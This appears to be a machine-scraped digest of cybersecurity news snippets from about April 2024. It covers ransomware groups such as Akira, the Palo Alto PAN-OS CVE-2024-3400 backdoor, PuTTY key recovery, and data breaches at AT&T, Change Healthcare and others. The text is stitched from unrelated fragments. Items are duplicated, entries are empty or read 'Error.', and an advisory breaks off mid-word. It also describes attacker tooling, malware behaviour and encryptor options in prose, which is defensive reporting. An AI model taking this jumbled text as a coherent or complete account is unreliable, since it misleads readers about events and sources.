The development comes amid the emergence of new ransomware families like Evil Ant, HelloFire, L00KUPRU (an Xorist ransomware variant), Muliaka (based on the leaked Conti ransomware code), Napoli (a Chaos ransomware variant), Red CryptoApp, Risen, and SEXi (based on the leaked Babuk ransomware code) that have been spotted targeting Windows and VMware ESXi servers. "Autosummary:
"Autosummary:
Diagram of activity concerning CVE-2023-1389 (Fortinet) "Recently, we observed multiple attacks focusing on this year-old vulnerability, spotlighting botnets like Moobot, Miori, the Golang-based agent "AGoent," and the Gafgyt Variant." "Autosummary:
" "The backdoor"s victimology, infrequent sightings, and level of stealth and sophistication indicate APT-level activity, highly likely of Russian origin." "Autosummary:
"Autosummary:
"Autosummary:
"These aims include priming the information space with narratives favorable to Russia, generating perceptions of popular support for the war for domestic and foreign audiences, and making the GRU’s cyber capabilities appear more potent through exaggerated claims of impact" - Mandiant The war in Ukraine made Sandworm notorious for launching multi-faceted attacks aimed at causing damage to the country"s critical infrastructure and services, including state networks, telecommunications providers, news media, and the power grid. "Autosummary:
The agttydck malware, written in C++ and packed with UPX, performs several malicious actions: it logs activity in “/tmp/log.0” at startup and “/tmp/log.1” at completion, searches the root directory for encryptable directories, drops a ransom note in each directory, and encrypts all files, appending a “.L0CK3D” extension.Linux variant of Cerber ransomware targets Atlassian servers Pierluigi Paganini April 17, 2024 April 17, 2024 Threat actors are exploiting the CVE-2023-22518 flaw in Atlassian servers to deploy a Linux variant of Cerber (aka C3RB3R) ransomware. "Autosummary:
Tricking Android"s parser Manifest files ("AndroidManifest.xml") are present in each app"s root directory and contain details about components (services, broadcast receivers, content providers), permissions, and app data. "Autosummary:
Once executed, the file triggers a multi-stage process involving DLL, WAV files, and shellcode execution, leading to loading and decrypting a file named "dmxl.bin," which contains the Anunak backdoor payload. "Autosummary:
Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Episode links: Sponsored by: Bitwarden – Password security you can trust. "Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The United States’ Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Europol’s European Cybercrime Centre (EC3), and the Netherlands’ National Cyber Security Centre (NCSC-NL) are releasing this joint CSA to disseminate known Akira ransomware IOCs and TTPs identified through FBI investigations and trusted third party reporting as recently as February 2024.
Since March 2023, Akira ransomware has impacted a wide range of businesses and critical infrastructure entities in North America, Europe, and Australia. In April 2023, following an initial focus on Windows systems, Akira threat actors deployed a Linux variant targeting VMware ESXi virtual machines. As of January 1, 2024, the ransomware group has impacted over 250 organizations and claimed approximately $42 million (USD) in ransomware proceeds.
Early versions of the Akira ransomware variant were written in C++ and encrypted files with a .akira extension; however, beginning in August 2023, some Akira attacks began deploying Megazord, using Rust-based code which encrypts files with a .powerranges extension. Akira threat actors have continued to use both Megazord and Akira, including Akira_v2 (identified by trusted third party investigations) interchangeably.
The FBI, CISA, EC3, and NCSC-NL encourage organizati "
Autosummary:
The FBI, CISA, EC3, and NCSC-NL do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document.To establish command and control channels, threat actors leverage readily available tools like AnyDesk, MobaXterm, RustDesk, Ngrok, and Cloudflare Tunnel, enabling exfiltration through various protocols such as File Transfer Protocol (FTP), Secure File Transfer Protocol (SFTP), and cloud storage services like Mega Additional details of interest include: a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators.SoftPerfect A network scanner ( netscan.exe ) used to ping computers, scan ports, discover shared folders, and retrieve information about network devices via Windows Management Instrumentation (WMI), Simple Network Management Protocol (SNMP), HTTP, Secure Shell (SSH) and PowerShell.Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI or CISA. VALIDATE SECURITY CONTROLS In addition to applying mitigations, the FBI, CISA, EC3, and NCSC-NL recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The FBI is interested in any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Akira threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.Previous versions of the encryptor provided options to insert arguments at runtime, including: -p --encryption_path (targeted file/folder paths) -s --share_file (targeted network drive path) -n --encryption_percent (percentage of encryption) --fork (create a child process for encryption The ability to insert additional threads allows Akira threat actors to have more granular control over the number of CPU cores in use, increasing the speed and efficiency of the encryption process.[T1133], spear phishing [T1566.001][T1566.002], and the abuse of valid credentials[T1078].[4] Persistence and Discovery Once initial access is obtained, Akira threat actors attempt to abuse the functions of domain controllers by creating new domain accounts [T1136.002] to establish persistence. MITIGATIONS Network Defenders The FBI, CISA, EC3, and NCSC-NL recommend organizations apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the risk of compromise by Akira ransomware.A tool used to acquire detailed process and system information [T1082].[7] PowerShell A cross-platform task automation solution made up of a command line shell, a scripting language, and a configuration management framework, which runs on Windows, Linux, and macOS. The United States’ Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Europol’s European Cybercrime Centre (EC3), and the Netherlands’ National Cyber Security Centre (NCSC-NL) are releasing this joint CSA to disseminate known Akira ransomware IOCs and TTPs identified through FBI investigations and trusted third party reporting as recently as February 2024. The FBI, CISA, EC3, and NCSC-NL recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory. Exfiltration and Impact Akira threat actors leverage tools such as FileZilla, WinRAR [T1560.001], WinSCP, and RClone to exfiltrate data [T1048]. "Autosummary:
Error. "In this Help Net Security interview, Caleb Sima, Chair of CSA AI Security Alliance, discusses how AI empowers security pros, emphasizing its role in enhancing skills and productivity rather than replacing staff. AI is seen as empowering rather than replacing security pros. How do you foresee AI changing their roles in the future? While the future of AI replacing jobs remains uncertain, I am confident it’s not imminent. AI is a tool that can be … More
The post AI set to enhance cybersecurity roles, not replace them appeared first on Help Net Security.
"Autosummary:
In fact, a survey – State of AI and Security Survey Report – that CSA recently conducted with Google found that the majority of organizations plan to use AI to strengthen their teams, whether that means enhancing their skills and knowledge base (36%) or improving detection times (26%) and productivity (26%), rather than replacing staff altogether.That being the case, I’d caution companies, regardless of where they are on their AI journey, to understand that they will encounter challenges, whether from integrating this technology into current processes or ensuring that staff are properly trained in using this revolutionary technology, and that’s to be expected. "Autosummary:
According to the announcement, the stolen data includes: - 285 Gb of quality control data - 24 Gb - 896 client folders, many famous brands like SpaceX, IBM, Apple, Huawei, etc. - 139 Gb project data, very detailed and highly confidential: NDA, internal documents, trade secrets, design, specifications, manufacturing - 49 Gb industrial production data and instructions - Assessment of the product"s competitiveness in comparison with competitors - 45 Gb engineers" experience and studies - 20 Gb product management - 201 Gb semiconductor manufacturing technologies - 70 Gb semiconductor commercial marketing data - 26 Gb pricing, analysis, price books - 20 Gb HR department, employee data, personal data, passports, contracts, diplomas, salaries, insurance. "GuidePoint Security announced its IoT Security Assessment, a new cybersecurity service. GuidePoint Security’s team of IoT security and embedded systems experts have extensive experience identifying potential weaknesses in IoT devices and applications across a wide range of industries. Organizations that leverage GuidePoint’s targeted IoT Security Assessment can ultimately identify and fix vulnerabilities, fortify their defenses, inspire confidence in their customers, and prevent unwanted access to their IoT ecosystem. “IoT devices are prevalent in many industries, … More
The post GuidePoint Security introduces IoT Security Assessment appeared first on Help Net Security.
"Autosummary:
“IoT devices are prevalent in many industries, yet the risks associated with them are often underestimated or overlooked, leaving many organizations and their IT systems vulnerable to potential threats,” said Victor Wieczorek, VP of Application Security and Threat & Attack Simulation, GuidePoint Security. "Autosummary:
The report paints a vivid picture of the "hidden" identity security liabilities where attackers leverage Identity Threat Exposures (ITEs) such as forgotten user accounts and misconfigurations to breach organizations" defenses, with each ITE posing a significant threat to organizations" security posture. "Autosummary:
While first linked by the company to "nation-state" hackers, the attack was later linked to the BlackCat/ALPHV ransomware group who claimed they stole 6 TB of data during the breach, The ransomware gang shut down its operation and likely pulled an exit scam by stealing a $22 million ransom paid to Notchy, the affiliate who coordinated the attack. "Autosummary:
Beyond Agent Tesla, other variants of the attack chain have led to an assortment of malware such as FormBook, GuLoader, LokiBot, Remcos RAT, Snake Keylogger, and XWorm, which are designed for remote access, data theft, and delivery of secondary payloads. "Autosummary:
"A vulnerability (CVE-2024-31497) in PuTTY, a popular SSH and Telnet client, could allow attackers to recover NIST P-521 client keys due to the “heavily biased” ECDSA nonces (random values used once), researchers have discovered. “To be more precise, the first 9 bits of each ECDSA nonce are zero. This allows for full secret key recovery in roughly 60 signatures by using state-of-the-art techniques,” Fabian Bäumer shared on the oss-sec mailing list. According to PuTTY maintainers, … More
The post PuTTY vulnerability can be exploited to recover private keys (CVE-2024-31497) appeared first on Help Net Security.
"Autosummary:
“If the key has been used to sign arbitrary data (e.g., git commits by forwarding Pageant [an SSH authentication agent for PuTTY] to a development host), the publicly available signatures (e.g., on GitHub) can be used as well,” Bäumer noted. "Zarf is a free, open-source tool that enables continuous software delivery on disconnected networks. It currently offers fully automated support for K3s, K3d, and Kind and is also compatible with EKS, AKS, GKE, RKE2, and many other distro services. The Zarf CLI, a statically compiled binary, operates independently without any dependencies, ensuring it runs smoothly on any machine. Unlike proprietary software, Zarf avoids vendor lock-in, allowing easy removal and manual deployment. The tool excels in … More
The post Zarf: Open-source continuous software delivery on disconnected networks appeared first on Help Net Security.
"Autosummary:
"In this Help Net Security video round-up, authors discuss their cybersecurity books and provide an inside look at each title. Complete videos George Finney, CSO at Southern Methodist University, talks about his book – “Project Zero Trust: A Story about a Strategy for Aligning Security and the Business“. Eric Leblond, CTO at Stamus Networks, talks about The Security Analyst’s Guide to Suricata, a book he co-wrote with Peter Manev. Adam Shostack, the author of “Threat … More
The post Expand your library with these cybersecurity books appeared first on Help Net Security.
"Autosummary:
"Autosummary:
" The raid on Golden Top Support Services, which has been described as a "significant breakthrough in the fight against cybercrime", not only arrested 77 people (including 22 Chinese men and one Cameroonian) but also seized vehicles, two firearms, 78 rounds of ammunition, 97 desktop PCs, 42 new and boxed computers, and over 13,000 Airtel, MTN, and Vodafone SIM cards. "Organizations with on-prem installations of Delinea Secret Server are urged to update them immediately, to plug a critical vulnerability that may allow attackers to bypass authentication, gain admin access and extract secrets. Fixing the Delinea Secret Server SOAP API vulnerability Delinea Secret Server (formerly Thycotic Secret Server) is a privileged access management (PAM) solution “for the modern, hybrid enterprise”. Among other things, PAM solutions can automate the provisioning and deprovisioning of privileged accounts, as well … More
The post A critical vulnerability in Delinea Secret Server allows auth bypass, admin access appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
" Omni Hotels Daixin Team leak (BleepingComputer) In October 2022, CISA, the FBI, and the Department of Health and Human Services (HHS) warned the Daixin Team cybercrime gang was targeting the U.S. Healthcare and Public Health (HPH) sector in ransomware attacks. "Autosummary:
The data contained in these logs includes an employee"s: Phone number Carrier Location data Date Time Message type When the impacted supplier discovered the breach, they invalidated the compromised credentials, analyzed activity logs, and notified Cisco accordingly. "Autosummary:
The company has now fixed the security flaw in hotfix releases issued for PAN-OS 10.2.9-h1, PAN-OS 11.0.4-h1, and PAN-OS 11.1.2-h3. "Autosummary:
CISA adds Palo Alto Networks PAN-OS Command Injection flaw to its Known Exploited Vulnerabilities catalog Pierluigi Paganini April 15, 2024 April 15, 2024 U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Palo Alto Networks PAN-OS Command Injection flaw to its Known Exploited Vulnerabilities catalog. "Autosummary:
After execution, the script records the command output in the file: [snip]/css/bootstrap.min.css A noteworthy aspect of the attack sequence is that both the files used for command extraction and result logging are authentic files linked with the firewall: /var/log/pan/sslvpn_ngx_error.log /var/appweb/sslvpndocs/global-protect/portal/css/bootstrap.min.css “The script will then create another thread that runs a function called restore.Threat actors exploited Palo Alto Pan-OS issue to deploy a Python Backdoor Pierluigi Paganini April 15, 2024 April 15, 2024 Threat actors have been exploiting the recently disclosed zero-day in Palo Alto Networks PAN-OS since March 26, 2024. "Autosummary:
41.5 GB of corporate data, including HR, employee personal details, passports, NDAs, etc. 109 GB of client and user data, including brands such as SpaceX, IBM, Apple, and Huawei. "Autosummary:
A true double-extortion After BlackCat shut down, the affiliate, Notchy, partnered with the RansomHub ransomware gang to extort Change Healthcare once again, even though the company allegedly already paid a ransom. "Autosummary:
The message logs did not contain any message content but did contain the phone number, phone carrier, country, and state to which each message was sent, as well as other metadata (e.g., date and time of the message, type of message, etc.).” "Autosummary:
“The attackers developed and deployed malware that targeted the gateways and deleted filesystems, directories, disabled remote access services, routing services for each device, and rewrote flash memory, destroyed NAND memory chips, UBI volumes and other actions that further disrupted operation of these gateways.” concludes the report.However, our analysis of data leaked by Blackjack, including the Fuxnet malware, indicates that only a little more than 500 sensor gateways were bricked by the malware in the attack, and the remote sensors and controllers likely remain intact.” reads the analysis published by Claroty. "Autosummary:
Only download apps from official app stores and never download pirated software Ensure your device is loaded with anti-malware software from as trusted provider Use a password manager for long, unique passwords on all accounts Use 2FA for your wallet and device Be skeptical: don’t click on links in unsolicited attachments or on social media ads/posts – even if they appear to be from legitimate sources Store your crypto in a “cold wallet” (that is, one not connected to the internet) such as Trezor, as this will insulate it from online threats Always do your research before making any crypto investments Always keep devices and software updated Avoid logging on to public Wi-Fi without a virtual private network (VPN) Never send strangers crypto – even if you’ve ‘met’ them online Before choosing an exchange, do some research to check their security credentials Separate your crypto trading from your personal and work devices and accounts.One variant, MS Drainer, stole an estimated $59m over a nine-month period Common info-stealers like RedLine Stealer, Agent Tesla, and Racoon Stealer all have cryptostealing capabilities ClipBanker Trojans – another type of general info-stealer – also exfiltrate cryptocurrency wallet account addresses Crypto-stealing malware is often found hidden in fake apps. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Palo Alto Networks firewalls under attack, hotfixes incoming! (CVE-2024-3400) Attackers are exploiting a command injection vulnerability (CVE-2024-3400) affecting Palo Alto Networks’ firewalls, the company has warned, and urged customers to implement temporary mitigations and get in touch to check whether their devices have been compromised. Strategies for secure identity management in hybrid environments In this Help Net Security interview, Charlotte … More
The post Week in review: Palo Alto Networks firewalls under attack, Microsoft patches two exploited zero-days appeared first on Help Net Security.
"Autosummary:
On this April 2024 Patch Tuesday, Microsoft has fixed a record 147 CVE-numbered vulnerabilities, including CVE-2024-29988, a vulnerability that Microsoft hasn’t marked as exploited, but Peter Girnus, senior threat researcher with Trend Micro’s Zero Day Initiative (ZDI), has found being leveraged by attackers in the wild. New infosec products of the week: April 12, 2024 Here’s a look at the most interesting products from the past week, featuring releases from Akamai, Bitdefender, Siemens, Veriato, and Index Engines. "Autosummary:
Canadian retail chain Giant Tiger data breach may have impacted millions of customers Pierluigi Paganini April 14, 2024 April 14, 2024 A threat actor claimed the hack of the Canadian retail chain Giant Tiger and leaked 2.8 million records on a hacker forum. "Autosummary:
While the exact nature of the command is unknown, it"s suspected that the URL serves as a delivery vehicle for a Python-based backdoor on the firewall that Volexity – which discovered in-the-wild exploitation of CVE-2024-3400 on April 10, 2024 – is tracking as UPSTYLE and is hosted on a different server ("144.172.79[.]92" and "nhdata.s3-us-west-2.amazonaws[.]com"). "Autosummary:
" Threat actor claims Giant Tiger breach from March, leaks records online (BleepingComputer) The stolen data in the dump, claims the threat actor, additionally includes the "website activity" of Giant Tiger customers. "Autosummary:
Diagram illustrating how the Upstyle backdoor operates Source: BleepingComputer In addition to the backdoor, Volexity observed the threat actors deploying additional payloads to start reverse shells, exfiltrate PAN-OS configuration data, remove log files, deploy the Golang tunneling tool named GOST." Exploiting zero-day since March Volexity says it first detected the zero-day exploitation on April 10, 2024, within the GlobalProtect feature of Palo Alto Networks PAN-OS, and notified the vendor of the activity. "Autosummary:
Crooks manipulate GitHub’s search results to distribute malware Pierluigi Paganini April 13, 2024 April 13, 2024 Researchers warn threat actors are manipulating GitHub search results to target developers with persistent malware. "The workplace experiences of women in cybersecurity are dramatically worse than men across virtually every category, according to a WiCyS and Aleria survey. Previous studies have illustrated that the representation of women in cybersecurity is much lower than it should be, but can’t explain why or how we can improve matters. Women confront exclusion at higher rates Women encounter exclusion at twice the rate of men, signaling a pressing need for industry-wide cultural and procedural … More
The post Why women struggle in the cybersecurity industry appeared first on Help Net Security.
"Autosummary:
Top four categories of exclusion The top four categories of exclusion faced by women are respect, career and growth, access and participation and recognition, signaling critical intervention points. "Autosummary:
"Autosummary:
TA547 is a financially motivated threat actor that has been active since at least November 2017, it was observed conducting multiple campaigns to deliver a variety of Android and Windows malware, including DanaBot, Gootkit, Lumma stealer, NetSupport RAT, Ursnif, and ZLoader. "Autosummary:
The vendor will implement hotfixes by Sunday with the release of the following versions: PAN-OS 10.2.9-h1 PAN-OS 11.0.4-h1 PAN-OS 11.1.2-h3 Products like Cloud NGFW, Panorama appliances, and Prisma Access are not affected. "Autosummary:
Road toll debt SMS phishing message (Pennsylvania State Police) Pennsylvania Turnpike, one of the road toll services whose customers were targeted in these attacks, cautioned those receiving the phishing messages not to tap the links. "Autosummary:
video.pyzw proof-of-concept exploit Source: BleepingComputer However, as you can see below, when you click on the video to watch it, Python automatically executes the script, which opens the command prompt. Instead, Telegram utilized a server-side fix that appends the .untrusted extension to pyzq files, that when clicked, will cause Windows to ask what program you wish to use to open it, rather than automatically launching in Python. "Earlier today, Palo Alto Networks revealed that a critical command injection vulnerability (CVE-2024-3400) in the company’s firewalls has been exploited in limited attacks and has urged customers with vulnerable devices to quickly implement mitigations and workarounds. Palo Alto Networks’ Unit 42 and Volexity have now released threat briefs with more information about the attacks, threat hunting queries, YARA rules, and indicators of compromise. PAN’s insights “We are tracking the initial exploitation of this vulnerability under … More
The post CVE-2024-3400 exploited: Unit 42, Volexity share more details about the attacks appeared first on Help Net Security.
"Autosummary:
Palo Alto Networks’ Unit 42 and Volexity have now released threat briefs with more information about the attacks, threat hunting queries, YARA rules, and indicators of compromise. They also explained how the backdoor the attackers installed on targeted devices works, persists, and hides its presence, and have shared threat hunting queries for customers of its Cortex XDR solution. "Autosummary:
video.pyzw proof-of-concept exploit Source: BleepingComputer However, as you can see below, when you click on the video to watch it, Python automatically executes the script, which opens the command prompt. Instead, Telegram utilized a server-side fix that appends the .untrusted extension to pyzq files, that when clicked, will cause Windows to ask what program you wish to use to open it, rather than automatically launching in Python. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Apparently, the software, designed to remote-control phones, was used to make them act like online bots, collectively liking posts, following people on social media, and posting comments. "Digimarc and DataTrails have partnered to deliver a fully integrated content protection solution to fortify digital content using advanced digital watermarks in tandem with cryptographic proofs, or fingerprints. Combined with provenance metadata, these technologies create a multi-layered toolset to provide proof of digital content authenticity — protecting content creators, businesses, and consumers from the threat of fake data and misinformation. GenAI has changed the rules in content protection. Today, provenance metadata can easily be stripped … More
The post Digimarc and DataTrails join forces to provide proof of digital content authenticity appeared first on Help Net Security.
"Autosummary:
Solving the content protection challenge Committed to collaboration across industries and the public and private sectors, the Digimarc-DataTrails partnership follows the multi-layered approach to conveying digital media transparency set forth in Partnership on AI’s (PAI) Synthetic Media Framework, a Framework for the ethical and responsible development, creation, and sharing of synthetic media. "Autosummary:
Microsoft fixed two zero-day bugs exploited in malware attacks Pierluigi Paganini April 11, 2024 April 11, 2024 Microsoft addressed two zero-day vulnerabilities (CVE-2024-29988 and CVE-2024-26234) actively exploited by threat actors to deliver malware Microsoft addressed two zero-day vulnerabilities, tracked as CVE-2024-29988 and CVE-2024-26234, that threat actors are exploiting to deliver malware. "Business intelligence / data analytics software vendor Sisense has apparently suffered a data breach that spurred the company and the US Cybersecurity and Infrastructure Security Agency to push the company’s customers to “reset credentials and secrets potentially exposed to, or used to access, Sisense services.” What is known about the Sisense data breach? Details about the security incident are still being kept under wraps by Sisense. A notification by the company’s chief information security officer … More
The post CISA warns about Sisense data breach appeared first on Help Net Security.
"Autosummary:
"Your organization has been hit by ransomware and a decision has to be made on whether or not to make the ransom payment to get your data decrypted, deleted from attackers’ servers, and/or not leaked online. The decision will depend on a variety of factors but, according to GuidePoint Security, an important one should be the overall maturity and prominence of the ransomware operators who pulled off the attack. Immature ransomware groups: A distinct threat … More
The post Ransomware group maturity should influence ransom payment decision appeared first on Help Net Security.
"Autosummary:
"Autosummary:
" TA547 is a prolific, financially motivated threat actor that"s known to be active since at least November 2017, using email phishing lures to deliver a variety of Android and Windows malware such as ZLoader, Gootkit, DanaBot, Ursnif, and even Adhubllka ransomware. "Autosummary:
Palo Alto Networks fixed multiple DoS bugs in its firewalls Pierluigi Paganini April 11, 2024 April 11, 2024 Palo Alto Networks fixed several vulnerabilities in its PAN-OS operating system, including 3 issues that can trigger a DoS condition on its firewalls. "Autosummary:
Hunters International is a Ransomware-as-a-Service (RaaS) operation that emerged in mid-2023, whose encryptor shares code with the Hive ransomware operation, indicating a possible rebrand. "Autosummary:
"Autosummary:
The similar names should not, of course, be considered proof of a connection - and it"s always possible that the name of DragonForce has been chosen intentionally by the ransomware gang to lead investigators off the scent, or as a piece of mischief-making. Like many other ransomware groups, DragonForce attempts to extort money from its victims in two ways - locking companies out of their computers and data through encryption, and exfiltrating data from compromised systems with the threat of releasing it to others via the dark web. "Autosummary:
"The Cybersecurity and Infrastructure Security Agency (CISA) announces today a new release of our malware analysis system, called Malware Next-Gen, which allows any organization to submit malware samples and other suspicious artifacts for analysis," reads the announcement. "Autosummary:
"Autosummary:
Regards, Sangram Dash Chief Information Security Officer The company launched an investigation into the security breach which is still ongoing. "Autosummary:
Error. "Application Security Engineer HCLTech | Mexico | Remote – View job details As an Application Security Engineer, you will work on the security engineering team and collaborate with other IT professionals to ensure that user data is protected. Cybersecurity Incident Response Specialist Amer Sports | Germany | Hybrid – View job details As an Incident Response Specialist, you’ll play an essential role in proactively preparing for, responding to, and recovering from cybersecurity incidents, ensuring the … More
The post Cybersecurity jobs available right now: April 10, 2024 appeared first on Help Net Security.
"Autosummary:
Cybersecurity Incident Response Specialist Amer Sports | Germany | Hybrid – View job details As an Incident Response Specialist, you’ll play an essential role in proactively preparing for, responding to, and recovering from cybersecurity incidents, ensuring the protection of Amer Sports’ digital assets, and maintaining business continuity. Security Architect ASSA ABLOY Group | Sweden | On-site – View job details The company are seeking a talented and self-motivated individual with expertise in process definition, implementation, monitoring, and improvement, crucial for enhancing ASSA ABLOY’s incident management capabilities. "Autosummary:
The two shortcomings that have come under active exploitation are below - CVE-2024-26234 (CVSS score: 6.7) - Proxy Driver Spoofing Vulnerability (CVSS score: 6.7) - Proxy Driver Spoofing Vulnerability CVE-2024-29988 (CVSS score: 8.8) - SmartScreen Prompt Security Feature Bypass Vulnerability While Microsoft"s own advisory provides no information about CVE-2024-26234, cybersecurity firm Sophos said it discovered in December 2023 a malicious executable ("Catalog.exe" or "Catalog Authentication Client Service") that"s signed by a valid Microsoft Windows Hardware Compatibility Publisher (WHCP) certificate. "These techniques can bypass the detection and enforcement policies of traditional tools, such as cloud access security brokers, data loss prevention, and SIEMs, by hiding downloads as less suspicious access and sync events," Eric Saraga said. "Autosummary:
"Autosummary:
A new ransomware group, RansomHub, has listed the organisation as a victim on its dark web leak site, saying it has 4 TB of “highly selective data,” which relates to “all Change Health clients that have sensitive data being processed by the company.”Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. ALPHV used the ransomware-as-a-service (RaaS) business model, selling the software and infrastructure used to carry out ransomware attacks to criminal gangs known as affiliates, in return for a share of the ransoms they extorted. "Next week, Diverto is set to release a comprehensive report on Croatia’s cybersecurity landscape. This report will provide a detailed summary of the key events from 2023, offer targeted recommendations for managerial strategies, and highlight crucial regulations like NIS2 and DORA. If you’d like to learn more about the report and receive it once released, you can attend a live stream (in Croatian) on Tuesday, April 16. The event will include an expert panel: Ana … More
The post Upcoming report on the state of cybersecurity in Croatia appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The attacks, codenamed Heckler and WeSee, make use of malicious interrupts to break the integrity of CVMs, potentially allowing threat actors to remotely log in and gain elevated access, as well as perform arbitrary read, write, and code injection to disable firewall rules and open a root shell. "Autosummary:
Think of it like this: misconfigurations, forgotten accounts, and old settings are like cracks in your digital fortress walls. "Autosummary:
Building upon the foundational principles of EDR and threat intelligence, XDR integrates data from multiple security controls, such as endpoints, networks, cloud environments, and applications, into one unified platform.As businesses in every sector embrace digital transformation initiatives, adopting cloud computing, Internet of Things (IoT) devices, automation, AI, and interconnected ecosystems, their attack surface widens exponentially.Cybersecurity in the Evolving Threat Landscape Pierluigi Paganini April 10, 2024 April 10, 2024 As technology evolves and our dependence on digital systems increases, the cybersecurity threat landscape also rapidly changes, posing fresh challenges for organizations striving to protect their assets and data. "Autosummary:
"The [exposed] information varied by individual and account, but may have included full name, email address, mailing address, phone number, social security number, date of birth, AT&T account number and AT&T passcode," reads the notification. "Autosummary:
Hidden payload Source: Checkmarx The script that executes during the project build consists of a batch script and a base64-encoded PowerShell script that executes successively to perform the following actions: Wipe temporary files Retrieve the IP address and determine if the location is Russia Download encrypted files from a specified URL depending on the country code Decrypt, extract, and execute the downloaded files. "Malwarebytes has launched Malwarebytes Digital Footprint Portal, a web portal that gives individuals deep visibility into their exposed personal information, including clear text passwords. Now, anyone can easily see where and when a breach compromised their data, types of data exposed, and specific personal data for sale on the dark web. The web portal also includes clear, actionable recommendations to reduce the resulting risks of identity theft, financial harm or reputation damage. “At Malwarebytes, we … More
The post Malwarebytes Digital Footprint Portal offers insights into exposed passwords and personal data appeared first on Help Net Security.
"Autosummary:
The scan can include an individual’s general information (date of birth, address, phone number), sensitive personal information (social security number, driver’s license number), online digital identifiers (usernames, passwords, devices, networks), financial information (credit card details, bank account information, credit score, salary, estimated net worth, crypto wallet addresses), and more. "NICE Actimize announced IFM 11 (Integrated Fraud Management), a new release of its AI-driven fraud management and detection platform. The new release leverages recent advancements in artificial intelligence together with NICE Actimize’s collective intelligence capabilities to introduce fraud detection accuracy, agility and efficiency to protect financial services firms and their customers from the next generation of AI-driven fraud and scams. This enhanced version is the first solution to deliver AI pervasively across all fraud prevention … More
The post NICE Actimize enhances Integrated Fraud Management platform to help financial services prevent scams appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"In contrast to past incidents where attackers were found to add hundreds or thousands of stars to their repos, it appears that in these cases, the attackers opted for a more modest number of stars, probably to avoid raising suspicion with an exaggerated number," Gelb said. "Autosummary:
"Autosummary:
Two attack methods are Branch Target Injection (BTI), which involves manipulating the CPU"s branch prediction to execute unauthorized code paths, and Branch History Injection (BHI), which manipulates branch history to cause speculative execution of chosen gadgets (code paths), leading to data leakage. As the CERT Coordination Center (CERT/CC) disclosed yesterday, the new flaw, tracked as CVE-2024-2201, allows unauthenticated attackers to read arbitrary memory data by leveraging speculative execution, bypassing present security mechanisms designed to isolate privilege levels. "Autosummary:
TA547, also known as Scully Spider, has been active since at least 2017 delivering a variety of malware for Windows (ZLoader/Terdot, Gootkit, Ursnif, Corebot, Panda Banker, Atmos) and Android (Mazar Bot, Red Alert) systems. "Autosummary:
"Autosummary:
“Here is the data that is available in this leak: Name Phone number Physical address Email address Social security number Date of birth” The threat actors claimed that data belonged to AT&T customers in the United States, the group told RestorePrivacy that they were available to support AT&T in securing its systems for a reward. AT&T initially denied any data breach, below is the statement from the telecomunication giant: “Based on our investigation Thursday, the information that appeared in an internet chat room does not appear to have come from our systems,” Later, the telecommunications company retracted its initial denial and confirmed the data breach. "Autosummary:
The potentially compromised PHI may have included member/patient name, address, telephone number, e-mail address, date of birth and/or death, social security number, member number, and Medicare and/or Medicaid number. "Autosummary:
A new ransomware group, RansomHub, has listed the organisation as a victim on its dark web leak site, saying it has 4 TB of “highly selective data,” which relates to “all Change Health clients that have sensitive data being processed by the company.”Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. ALPHV used the ransomware-as-a-service (RaaS) business model, selling the software and infrastructure used to carry out ransomware attacks to criminal gangs known as affiliates, in return for a share of the ransoms they extorted. "Autosummary:
"Autosummary:
"Autosummary:
Error. "Autosummary:
Also delivered using the plugin system is a stealer that gathers information about the system and exfiltrates data from folders associated with wallets and applications like Atomic Wallet, Electrum, Ethereum, Exodus, Jaxx Liberty (retired as of March 2023), Zcash, Foxmail, and Telegram to a remote server. "Autosummary:
CL0P was able to capitalize on vulnerable networks and systems extremely quickly, extracting sensitive data from some of the world"s largest organizations (BBC, Ernst Young, PwC, Gen Digital, British Airways, TFL, Siemens, and many more). Those at greater risk, for instance, those in industries specifically targeted by CLOP (Finance, Manufacturing, Healthcare), or those that hold sensitive data, should work with an MSSP to ensure that the best security practices are in place. CL0P operates a Ransomware-as-a-Service model (RaaS), which frequently employs the "steal, encrypt, and leak" tactics common worldwide among many ransomware affiliates. "Autosummary:
" Health data stolen during the January ransomware attack includes affected individuals" names, addresses, telephone numbers, e-mail addresses, dates of birth and/or deaths, social security numbers, member numbers, and Medicare and/or Medicaid numbers. "Autosummary:
